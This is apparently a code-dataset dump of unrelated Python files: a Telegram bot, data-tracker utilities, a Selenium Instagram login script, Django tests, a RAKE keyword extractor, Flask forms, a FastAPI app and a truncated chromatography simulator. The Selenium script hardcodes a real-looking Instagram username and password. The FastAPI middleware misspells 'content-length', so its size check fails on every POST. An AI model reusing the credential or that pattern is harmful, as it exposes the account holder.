| null | null | null | src/constants.py | MitraSeifari/pystackoverflow | 70da1c6a8407df34496fe9843e8ae7f4c15aac0e | [
"MIT"
]
| null | null | null | from types import SimpleNamespace
from src.utils.keyboard import create_keyboard
keys = SimpleNamespace(
settings=':gear: Settings',
cancel=':cross_mark: Cancel',
back=':arrow_left: Back',
next=':arrow_right: Next',
add=':heavy_plus_sign: Add',
edit=':pencil: Edit',
save=':check_mark_button: Save',
delete=':wastebasket: Delete',
yes=':white_check_mark: Yes',
no=':negetive_squared_cross_mark: No',
ask_question=':red_question_mark: Ask a question',
send_question=':envelope_with_arrow: Send question',
)
keyboards = SimpleNamespace(
main=create_keyboard(keys.ask_question, keys.settings),
ask_question=create_keyboard(keys.cancel, keys.send_question),
)
states = SimpleNamespace(
main='MAIN',
ask_question='ASK_QUESTION'
)
| 26.466667 | 66 | 0.715365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 314 | 0.395466 |
9051a1c1088095b37931ffbb5f87a6219186207b | 456 | py | Python | iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 2211b4755405eb32178a09f1a01143d53dc6516d | [
"BSD-3-Clause"
]
| null | null | null | iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 2211b4755405eb32178a09f1a01143d53dc6516d | [
"BSD-3-Clause"
]
| null | null | null | iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 2211b4755405eb32178a09f1a01143d53dc6516d | [
"BSD-3-Clause"
]
| null | null | null | # Author: Guilherme Aldeia
# Contact: [email protected]
# Version: 1.0.0
# Last modified: 08-20-2021 by Guilherme Aldeia
"""
Simple exception that is raised by explainers when they don't support local
or global explanations, or when they are not model agnostic. This should be
catched and handled in the experiments.
"""
class NotApplicableException(Exception):
def __init__(self, message=""):
self.message = message | 32.571429 | 76 | 0.730263 | 109 | 0.239035 | 0 | 0 | 0 | 0 | 0 | 0 | 339 | 0.743421 |
90534359708ff8911197cad1bfec21d46c458905 | 1,302 | py | Python | covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 7af3013ad9142a20cf42963e39c8968081cec7db | [
"MIT"
]
| null | null | null | covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 7af3013ad9142a20cf42963e39c8968081cec7db | [
"MIT"
]
| 51 | 2020-05-31T17:36:37.000Z | 2020-06-24T05:23:19.000Z | covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 7af3013ad9142a20cf42963e39c8968081cec7db | [
"MIT"
]
| 1 | 2020-06-11T19:35:41.000Z | 2020-06-11T19:35:41.000Z | import click
from covid_data_tracker.registry import PluginRegistry
def plugin_selector(selected_country: str):
"""plugin selector uses COUNTRY_MAP to find the appropriate plugin
for a given country.
Parameters
----------
selected_country : str
specify the country of interest.
Returns
-------
covid_data_tracker.plugins.BasePlugin
More appropriately, returns an instance of a country-specific
subclass of BasePlugin.
"""
if selected_country in PluginRegistry.keys():
klass = PluginRegistry[selected_country]
instance = klass()
else:
raise AttributeError
click.echo('No country plugin available')
return instance
def country_downloader(country: str):
"""Finds country plugin, fetches data, and downloads
to csv with click alerts.
Parameters
----------
country : str
Name of country
Returns
-------
NoneType
"""
click.echo(f"selecting plugin for {country}")
country_plugin = plugin_selector(country)
click.echo(f"attempting to find available data for {country}")
country_plugin.fetch()
click.echo(f"downloading available data for {country}")
country_plugin.check_instance_attributes()
country_plugin.download()
| 25.529412 | 70 | 0.675115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 731 | 0.561444 |
90541de92a1d97d772f070e495cb4dccfca0eef7 | 1,416 | py | Python | dev/libs.py | karimwitani/webscraping | 58d4b2587d039fcea567db2caf86bbddb4e0b96f | [
"MIT"
]
| null | null | null | dev/libs.py | karimwitani/webscraping | 58d4b2587d039fcea567db2caf86bbddb4e0b96f | [
"MIT"
]
| null | null | null | dev/libs.py | karimwitani/webscraping | 58d4b2587d039fcea567db2caf86bbddb4e0b96f | [
"MIT"
]
| null | null | null | import selenium
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
def browser_init():
option = webdriver.ChromeOptions()
browser = webdriver.Chrome(executable_path='/Library/Application Support/Google/chromedriver', chrome_options=option)
return browser
def insta_login(browser):
browser.get('https://www.instagram.com')
#Find username/pass fields
username = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="username"]')))
password = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="password"]')))
#input username and pass
username.clear()
username.send_keys('itanikarim')
password.clear()
password.send_keys('1995PPrr')
#Login
Login_button = WebDriverWait(browser, 2).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="loginForm"]/div/div[3]'))).click()
#Skip buttons
not_now = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
not_now2 = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
print("everything ok") | 40.457143 | 136 | 0.738701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 348 | 0.245763 |
905515ca4421e0d997a1e7e93a11455f5f918cff | 380 | py | Python | setup.py | dwastberg/osmuf | 0cef4e87401b3fc2d344d7e067b4d9ada25848a4 | [
"MIT"
]
| null | null | null | setup.py | dwastberg/osmuf | 0cef4e87401b3fc2d344d7e067b4d9ada25848a4 | [
"MIT"
]
| null | null | null | setup.py | dwastberg/osmuf | 0cef4e87401b3fc2d344d7e067b4d9ada25848a4 | [
"MIT"
]
| null | null | null | from setuptools import setup
setup(name='osmuf',
version='0.1',
install_requires=[
"seaborn",
],
description='Urban Form analysis from OpenStreetMap',
url='http://github.com/atelierlibre/osmuf',
author='AtelierLibre',
author_email='[email protected]',
license='MIT',
packages=['osmuf'],
zip_safe=False)
| 25.333333 | 59 | 0.615789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 148 | 0.389474 |
905714b59b0d263f8c19b411a33bd80163e9bbb7 | 1,813 | py | Python | tests/test_model.py | artemudovyk/django-updown | 0353cf8ec5c50b4ffd869a56f51ede65b6368ef8 | [
"BSD-2-Clause"
]
| 41 | 2015-01-07T07:43:33.000Z | 2020-09-23T04:35:09.000Z | tests/test_model.py | artemudovyk/django-updown | 0353cf8ec5c50b4ffd869a56f51ede65b6368ef8 | [
"BSD-2-Clause"
]
| 20 | 2015-01-28T21:02:56.000Z | 2018-08-14T13:39:31.000Z | tests/test_model.py | artemudovyk/django-updown | 0353cf8ec5c50b4ffd869a56f51ede65b6368ef8 | [
"BSD-2-Clause"
]
| 19 | 2015-01-06T12:50:05.000Z | 2022-01-21T17:01:56.000Z | # -*- coding: utf-8 -*-
"""
tests.test_model
~~~~~~~~~~~~~~~~
Tests the models provided by the updown rating app
:copyright: 2016, weluse (https://weluse.de)
:author: 2016, Daniel Banck <[email protected]>
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import random
from django.test import TestCase
from django.contrib.auth.models import User
from updown.models import SCORE_TYPES
from updown.exceptions import CannotChangeVote
from tests.models import RatingTestModel
class TestRatingModel(TestCase):
"""Test case for the generic rating app"""
def setUp(self):
self.instance = RatingTestModel.objects.create()
self.user = User.objects.create(
username=str(random.randint(0, 100000000))
)
self.user2 = User.objects.create(
username=str(random.randint(0, 100000000))
)
def test_basic_vote(self):
"""Test a simple vote"""
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 1)
def test_change_vote(self):
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.instance.rating.add(SCORE_TYPES['DISLIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 0)
self.assertEquals(self.instance.rating_dislikes, 1)
def test_change_vote_disallowed(self):
self.instance.rating2.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertRaises(CannotChangeVote, self.instance.rating2.add,
SCORE_TYPES['DISLIKE'], self.user, '192.168.0.1')
| 31.258621 | 75 | 0.629344 | 1,294 | 0.713734 | 0 | 0 | 0 | 0 | 0 | 0 | 421 | 0.232212 |
90571fc1423b9d2a5a71dbb91569f10170f5532e | 5,179 | py | Python | nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | df98ee25f8a1f4379e751fdd4fd9f5389ffbfd1b | [
"MIT"
]
| null | null | null | nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | df98ee25f8a1f4379e751fdd4fd9f5389ffbfd1b | [
"MIT"
]
| null | null | null | nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | df98ee25f8a1f4379e751fdd4fd9f5389ffbfd1b | [
"MIT"
]
| null | null | null | import sys,os
from typing import List
from collections import defaultdict, Counter
from itertools import groupby, chain, product
import heapq
from pprint import pprint
import string
class Rake():
def __init__(
self,
text:List[List[str]],
stopwords=[],
max_words=100,
min_chars=3
):
self.text = text
self.stopwords = stopwords
self.blacklist = set(chain(stopwords, string.punctuation))
self._phrases = set()
# Частота (freq(w)) определяется как количество фраз,
# в которые входит рассматриваемое слово
self.freq = Counter()
# Степень (deg(w)) определяется как суммарное количество слов,
# из которых состоят фразы, в которых оно содержится.
self.degree = Counter()
# Вес слова определим как отношение степени слова к его частоте:
# s(w) = deg(w)/freq(w)
self.token_weights = Counter()
self.phrase_scores = Counter()
self.min_chars = min_chars
self.max_words = max_words
self._generate_phrases()
self._calc_frequencies()
self._calc_weights()
self._calc_scores()
def _generate_phrases(self):
'''Create contender phrases from sentences.'''
for sent in self.text:
self._phrases.update(self._get_phrase_list(sent))
def _get_phrase_list(self,sent):
'''Grouping the left words into phrases'''
groups = groupby(sent, lambda x: x not in self.blacklist)
phrases = [tuple(group[1]) for group in groups if group[0]]
result = []
for phrase in phrases:
if (
phrase
and len(' '.join(phrase)) >= self.min_chars
and len(phrase) <= self.max_words
):
result.append(phrase)
#print('_get_phrase_list')
#pprint(result)
return result
def _calc_frequencies(self):
'''Calculation of frequencies of words'''
for phrase in self._phrases:
for token in phrase:
self.freq[token] += 1
self.degree[token] += len(phrase) - 1 # 1 вычитается не везде; смысл?
# не во всех примерах Rake используется добавление частоты к degree ; смысл?
for token in self.freq:
self.degree[token] += self.freq[token]
def _calc_frequencies2(self):
self.freq = Counter(chain.from_iterable(self._phrases))
def build_occurance_graph():
graph = defaultdict(lambda: defaultdict(int))
for phrase in self._phrases:
# For each phrase in the phrase list, count co-occurances of the
# word with other words in the phrase.
#
# Note: Keep the co-occurances graph as is, to help facilitate its
# use in other creative ways if required later.
for (word, coword) in product(phrase, phrase):
graph[word][coword] += 1
return graph
graph = build_occurance_graph()
self.degree = defaultdict(int)
for token in graph:
self.degree[token] = sum(graph[token].values())
pprint(graph )
def _calc_weights(self):
# веса слов s(w) = deg(w)/freq(w)
for token in self.freq:
score = self.degree[token] / (self.freq[token] * 1.0)
self.token_weights[token] += score
def _calc_scores(self):
for phrase in self._phrases:
#print(phrase,self._phrases.count(phrase))
score = sum(self.token_weights.get(token,0) for token in phrase)
self.phrase_scores[' '.join(phrase)] += score
def topn(self,n=7,phrase=True):
'''Get top phrases with ratings'''
if phrase:
scores = self.phrase_scores
else:
scores = self.token_weights
if n < 0:
n = len(scores)
return heapq.nlargest(n,
scores,
key=scores.get
)
def phrases(self,scores=True):
if scores:
result = sorted(
self.phrase_scores.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.phrase_scores,
key=self.phrase_scores.get,
reverse=True
)
return result
def get_token_weights(self,scores=True):
if scores:
result = sorted(
self.token_weights.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.token_weights,
key=self.token_weights.get,
reverse=True
)
return result
| 30.827381 | 85 | 0.519598 | 5,255 | 0.96087 | 0 | 0 | 0 | 0 | 0 | 0 | 1,196 | 0.218687 |
90572919b03e5c9195f95e3b9733b72ece7106bb | 5,623 | py | Python | depimpact/tests/test_functions.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
]
| null | null | null | depimpact/tests/test_functions.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
]
| null | null | null | depimpact/tests/test_functions.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
]
| null | null | null | import numpy as np
import openturns as ot
def func_overflow(X, model=1, h_power=0.6):
"""Overflow model function.
Parameters
----------
X : np.ndarray, shape : N x 8
Input variables
- x1 : Flow,
- x2 : Krisler Coefficient,
- x3 : Zv, etc...
model : bool, optional(default=1)
If 1, the classical model. If 2, the economic model.
Returns
-------
Overflow S (if model=1) or Cost Cp (if model=2).
"""
X = np.asarray(X)
if X.shape[0] == X.size: # It's a vector
n = 1
dim = X.size
ids = None
else:
n, dim = X.shape
ids = range(n)
assert dim == 8, "Incorect dimension : dim = %d != 8" % dim
Q = X[ids, 0]
Ks = X[ids, 1]
Zv = X[ids, 2]
Zm = X[ids, 3]
Hd = X[ids, 4]
Cb = X[ids, 5]
L = X[ids, 6]
B = X[ids, 7]
H = (Q / (B * Ks * np.sqrt((Zm - Zv) / L)))**h_power
S = Zv + H - Hd - Cb
if model == 1:
return S
elif model == 2:
Cp = (S > 0.) + (0.2 + 0.8 * (1. - np.exp(-1000. / (S**4)))) * (S <= 0.) + 1./20. * (Hd * (Hd > 8.) + 8*(Hd <= 8.))
return Cp
else:
raise AttributeError('Unknow model.')
tmp = ot.Gumbel()
tmp.setParameter(ot.GumbelMuSigma()([1013., 558.]))
dist_Q = ot.TruncatedDistribution(tmp, 500., 3000.)
dist_Ks = ot.TruncatedNormal(30., 8., 15., np.inf)
dist_Zv = ot.Triangular(49., 50., 51.)
dist_Zm = ot.Triangular(54., 55., 56.)
dist_Hd = ot.Uniform(7., 9.)
dist_Cb = ot.Triangular(55., 55.5, 56.)
dist_L = ot.Triangular(4990., 5000., 5010.)
dist_B = ot.Triangular(295., 300., 305.)
margins_overflow = [dist_Q, dist_Ks, dist_Zv, dist_Zm, dist_Hd, dist_Cb, dist_L, dist_B]
var_names_overflow = ["Q", "K_s", "Z_v", "Z_m", "H_d", "C_b", "L", "B"]
def func_sum(x, a=None):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
y = np.dot(x, a)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_prod(x, a=None):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
y = np.sum(x, axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_spec(x, a=[0.58, -1, -1.0, 0, 0., 0.]):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
y = a[0]*(x**2).prod(axis=1) + \
a[1]*x.prod(axis=1) + \
a[2]*(x**2).sum(axis=1) + \
a[3] * x.sum(axis=1) + \
a[4] * np.sin(x).sum(axis=1) + \
a[5] * np.cos(x).sum(axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_cum_sum_weight(x, weights=None, use_sum=True, const=[0., 0., 0., 1., 0., 0.]):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
weights : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if weights is None:
weights = np.zeros((dim, dim))
corr_dim = dim * (dim-1)/2
k = 1
for i in range(1, dim):
for j in range(i):
weights[i, j] = k
k += 1
weights /= corr_dim
if weights.ndim == 1:
weights = weights.reshape(-1, 1)
assert weights.shape[0] == dim, "Shape not good"
elif weights.ndim > 2:
raise AttributeError('Dimension problem for constant a')
if use_sum:
y = 1
for i in range(1, dim):
for j in range(i):
y *= (1. + weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const))
else:
y = 0
for i in range(1, dim):
for j in range(i):
y += weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const)
return y
def multi_output_func_sum(x, output_dim=2):
"""Additive model function with multi output.
Parameters
----------
x : np.ndarray
The input values.
output_dim : int
The number of output dimension.
Returns
-------
y : [i * x]
"""
return np.asarray([x.sum(axis=1)*a for a in range(output_dim)]).T | 24.554585 | 123 | 0.486395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,793 | 0.318756 |
9059540a6a1df436a316a8b4d0bf19c43271fcb4 | 1,699 | py | Python | app/main/forms.py | ingabire1/blog | 5fcee6027cee9fbdcd94057123862bd146a16e98 | [
"Unlicense"
]
| null | null | null | app/main/forms.py | ingabire1/blog | 5fcee6027cee9fbdcd94057123862bd146a16e98 | [
"Unlicense"
]
| null | null | null | app/main/forms.py | ingabire1/blog | 5fcee6027cee9fbdcd94057123862bd146a16e98 | [
"Unlicense"
]
| null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField
from wtforms.validators import Required
class ReviewForm(FlaskForm):
title = StringField('Review title',validators=[Required()])
review = TextAreaField('Movie review', validators=[Required()])
submit = SubmitField('Submit')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
# class LoginForm(FlaskForm):
# email = StringField('Your Email Address',validators=[Required(),Email()])
# password = PasswordField('Password',validators =[Required()])
# remember = BooleanField('Remember me')
# submit = SubmitField('Sign In')
class BlogForm(FlaskForm):
# my_category = StringField('Category', validators=[Required()])
title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
post = SubmitField('Post Blog')
class CommentForm(FlaskForm):
name = StringField('Name',validators=[Required()])
# email = StringField('Email', validators=[Required()],render_kw={"placeholder": "Email"})
comment = TextAreaField('Enter Comment', validators=[Required()])
post = SubmitField('Post Comment')
class SubscriptionForm(FlaskForm):
name = StringField('First Name', validators=[Required()])
subscription_data = StringField('Email', validators=[Required()])
subscribe = SubmitField('Subscribe')
class UpdatePostForm(FlaskForm):
# title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
submit=SubmitField('SUBMIT')
| 42.475 | 94 | 0.712772 | 1,294 | 0.761624 | 0 | 0 | 0 | 0 | 0 | 0 | 652 | 0.383755 |
9059c31682941520b3a9802d364d8232668dc8f3 | 3,228 | py | Python | SEPHIRA/FastAPI/main.py | dman926/Flask-API | 49e052159a3915ec25305141ecdd6cdeb1d7a25c | [
"MIT"
]
| 4 | 2021-04-23T16:51:57.000Z | 2021-06-06T20:28:08.000Z | SEPHIRA/FastAPI/main.py | dman926/Flask-API | 49e052159a3915ec25305141ecdd6cdeb1d7a25c | [
"MIT"
]
| 15 | 2021-10-22T01:55:53.000Z | 2022-01-15T11:40:48.000Z | SEPHIRA/FastAPI/main.py | dman926/Flask-API | 49e052159a3915ec25305141ecdd6cdeb1d7a25c | [
"MIT"
]
| 3 | 2021-03-21T22:29:05.000Z | 2021-06-06T20:30:18.000Z | from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from starlette import status
from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from starlette.types import ASGIApp
from config import APISettings, CORSSettings, FastAPISettings, PayPalSettings, UvicornSettings, ShopSettings, NowPaymentsSettings
import logging
####
# Custom Middlewares #
####
class LimitPostContentSizeMiddleware(BaseHTTPMiddleware):
def __init__(self, app: ASGIApp, max_upload_size: int) -> None:
super().__init__(app)
self.max_upload_size = max_upload_size
async def dispatch(self, request: Request, call_next: RequestResponseEndpoint) -> Response:
if request.method == 'POST':
if 'content-length' not in request.headers:
return Response(status_code=status.HTTP_411_LENGTH_REQUIRED)
content_length = int(request.headers['content-lenght'])
if content_length > self.max_upload_size:
return Response(status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE)
return await call_next(request)
####
# #
####
logging.basicConfig(filename="log.log", level=logging.INFO, format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
logger = logging.getLogger(__name__)
app = FastAPI(debug=FastAPISettings.DEBUG)
app.add_middleware(
CORSMiddleware,
allow_origins=CORSSettings.ALLOW_ORIGINS,
allow_methods=['*'],
allow_headers=['*']
)
if UvicornSettings.MAX_CONTENT_SIZE:
app.add_middleware(
LimitPostContentSizeMiddleware,
max_upload_size=UvicornSettings.MAX_CONTENT_SIZE
)
@app.on_event('startup')
async def startup():
logger.info('-- STARTING UP --')
print('-- STARTING UP --')
from database.db import initialize_db
initialize_db()
from resources.routes import initialize_routes
initialize_routes(app)
if ShopSettings.ENABLE:
if NowPaymentsSettings.ENABLE:
from resources.nowpayments import getNowPaymentsStatus, setCachedAvailableCoins
if await getNowPaymentsStatus():
print('NOWPayments is online. Fetching available coins...')
for i in range(NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT):
if await setCachedAvailableCoins():
print('NOWPayments coins cached.')
break
else:
print('Failed to get NOWPayments coins.')
if i < NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1:
print(f'Retrying {NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1 - i} time(s).')
else:
print('NOWPayments not responding.')
print(f'Available coins will be set on the next reqest to {APISettings.ROUTE_BASE}payment/nowpayments/available-coins request if NOWPayments is available.')
print('-- STARTED UP --')
logger.info('-- STARTED UP --')
@app.on_event('shutdown')
async def shutdown():
logger.info('-- SHUTTING DOWN --')
print('-- SHUTTING DOWN --')
from database.db import close_db
close_db()
import os
import shutil
if os.path.exists('cache'):
shutil.rmtree('cache')
print('-- SHUT DOWN --')
logger.info('-- SHUT DOWN --')
if __name__== '__main__':
import uvicorn
uvicorn.run('main:app', reload=UvicornSettings.USE_RELOADER, log_level=UvicornSettings.LOG_LEVEL, port=UvicornSettings.PORT) | 32.606061 | 160 | 0.763011 | 636 | 0.197026 | 0 | 0 | 1,426 | 0.44176 | 1,821 | 0.564126 | 731 | 0.226456 |
905b8e431341e337a25074cf4f7919a71c8959b2 | 94,831 | py | Python | bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | c3e2cf4d7d646bda719e5fc6f694a1cae0e412c0 | [
"MIT"
]
| 5 | 2020-03-30T13:26:12.000Z | 2021-04-02T07:10:49.000Z | bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | c3e2cf4d7d646bda719e5fc6f694a1cae0e412c0 | [
"MIT"
]
| null | null | null | bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | c3e2cf4d7d646bda719e5fc6f694a1cae0e412c0 | [
"MIT"
]
| 1 | 2020-06-03T07:50:56.000Z | 2020-06-03T07:50:56.000Z | """Semi continuous unit operations.
Unit operations that accept constant or box-shaped flow rate profile
and provide periodic flow rate profile.
"""
__all__ = ['AlternatingChromatography', 'ACC', 'PCC', 'PCCWithWashDesorption']
__version__ = '0.7.1'
__author__ = 'Jure Sencar'
import typing as _typing
import numpy as _np
import scipy.interpolate as _interp
from bio_rtd.chromatography import bt_load as _bt_load
import bio_rtd.utils as _utils
import bio_rtd.core as _core
import bio_rtd.pdf as _pdf
class AlternatingChromatography(_core.UnitOperation):
"""Simulation of alternating chromatography.
This class implements logic common to various types of alternating
chromatography. It has a role of a base class for
specific types of alternating chromatography to extend.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "AC".
Notes
-----
**Quick description of which attributes are available:**
Non-binding species (optional):
* :attr:`non_binding_species`
Column volume (exactly one required):
* :attr:`cv`
* :attr:`ft_mean_retentate` and :attr:`column_porosity_retentate`
Column porosity for binding species (required in case of
:attr:`ft_mean_retentate` or wash or load recycling):
* :attr:`column_porosity_retentate`
Equilibration step duration (optional, if both, the values are
added together):
* :attr:`equilibration_cv`
* :attr:`equilibration_t`
Equilibration step flow rate (exactly one needed):
* :attr:`equilibration_f` - absolute, has priority if defined
* :attr:`equilibration_f_rel` - relative, default = 1
Load step duration:
* :attr:`load_cv` - preferred
* :attr:`load_c_end_ss` - concentration limit for breakthrough; also
requires :attr:`load_recycle_pdf`
* :attr:`load_c_end_relative_ss` - concentration limit for
breakthrough relative to steady-state load concentration; also
requires :attr:`load_recycle_pdf`
Iterative optimization of estimation of load step duration
(ignored if :attr:`load_cv` is defined):
* :attr:`load_c_end_estimate_with_iterative_solver` - default = True
* :attr:`load_c_end_estimate_with_iter_solver_max_iter` - default =
1000
Extension of first load step (optional; ignored if no recycling):
* :attr:`load_extend_first_cycle` - default = `False`
* :attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t` - added together if both defined
Load linear velocity - only for column height determination
(optional):
* :attr:`load_target_lin_velocity`
Wash step duration (optional, if both, the values are
added together):
* :attr:`wash_cv`
* :attr:`wash_t`
Wash step flow rate (exactly one needed):
* :attr:`wash_f` - absolute, has priority if defined
* :attr:`wash_f_rel` - relative, default = 1
Unaccounted losses - applied before peak cut (optional):
* :attr:`unaccounted_losses_rel` - relative, default = 1
Elution step duration (optional, if both, the values are
added together):
* :attr:`elution_cv`
* :attr:`elution_t`
Elution step flow rate (exactly one needed):
* :attr:`elution_f` - absolute, has priority if defined
* :attr:`elution_f_rel` - relative, default = 1
Elution buffer composition (optional):
* :attr:`elution_buffer_c`
Elution peak position duration - first momentum
(optional, if both, the values are added together):
* :attr:`elution_peak_position_cv`
* :attr:`elution_peak_position_t`
Elution peak cut start (one is required):
* :attr:`elution_peak_cut_start_t`
* :attr:`elution_peak_cut_start_cv`
* :attr:`elution_peak_cut_start_c_rel_to_peak_max`
* :attr:`elution_peak_cut_start_peak_area_share`
Elution peak cut end (one is required):
* :attr:`elution_peak_cut_end_t`
* :attr:`elution_peak_cut_end_cv`
* :attr:`elution_peak_cut_end_c_rel_to_peak_max`
* :attr:`elution_peak_cut_end_peak_area_share`
Regeneration step duration (optional, if both, the values are
added together):
* :attr:`regeneration_cv`
* :attr:`regeneration_t`
Regeneration step flow rate (exactly one needed):
* :attr:`regeneration_f` - absolute, has priority if defined
* :attr:`regeneration_f_rel` - relative, default = 1
Wash desorption (optional, also check if class supports it):
* :attr:`wash_desorption` - default = `False`
Load breakthrough recycle (optional):
* :attr:`load_recycle` - default = `False`
Load breakthrough propagation dynamics
(required if :attr:`load_recycle` is `True`
or :attr:`load_c_end_ss` is defined or
or :attr:`load_c_end_relative_ss` is defined):
* :attr:`load_recycle_pdf`
Wash recycle (optional):
* :attr:`wash_recycle` - default = `False`
Duration of wash recycling
(optional; ignored if :attr:`wash_recycle` is `False`):
* :attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` - summed together if both defined.
* Entire wash step if
:attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` are not defined.
Please note that subclasses might introduce new attributes or change
the default values of existing attributes.
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "AC"):
super().__init__(t, uo_id, gui_title)
# Bind parameters.
self.load_bt: _core.ChromatographyLoadBreakthrough = load_bt
"""Determines what part of load material binds to the column."""
self.elution_peak_shape: _core.PDF = peak_shape_pdf
"""Elution peak shape."""
self.non_binding_species: _typing.Sequence[int] = []
"""Process buffer species that are NOT binding to the column.
Indexing starts with 0.
"""
self.cv: float = -1
"""Column volume.
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv` (this one)
* :attr:`ft_mean_retentate`
and :attr:`column_porosity_retentate`
"""
self.ft_mean_retentate: float = -1
"""Flow-through time of retentate under non-binding conditions.
Used to define column volume (independently of scale).
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv`
* :attr:`ft_mean_retentate` (this one) and
:attr:`column_porosity_retentate`
"""
self.column_porosity_retentate: float = -1
"""Column porosity for retentate under non-binding conditions.
Required in case :attr:`ft_mean_retentate` is used to define
column volume.
Required in case :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss` are used to estimate
load step duration.
Required in case of load or wash recycling.
"""
self.equilibration_cv: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_t: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_f: float = -1
"""Equilibration step flow rate.
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f` (this one)
* :attr:`equilibration_f_rel`
"""
self.equilibration_f_rel: float = 1
"""Equilibration step flow rate relative to load flow rate.
Default = 1.
Equilibration step flow rate = :attr:`equilibration_f_rel`
* `load flow rate`
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f`
* :attr:`equilibration_f_rel` (this one)
"""
# Duration of the load phase.
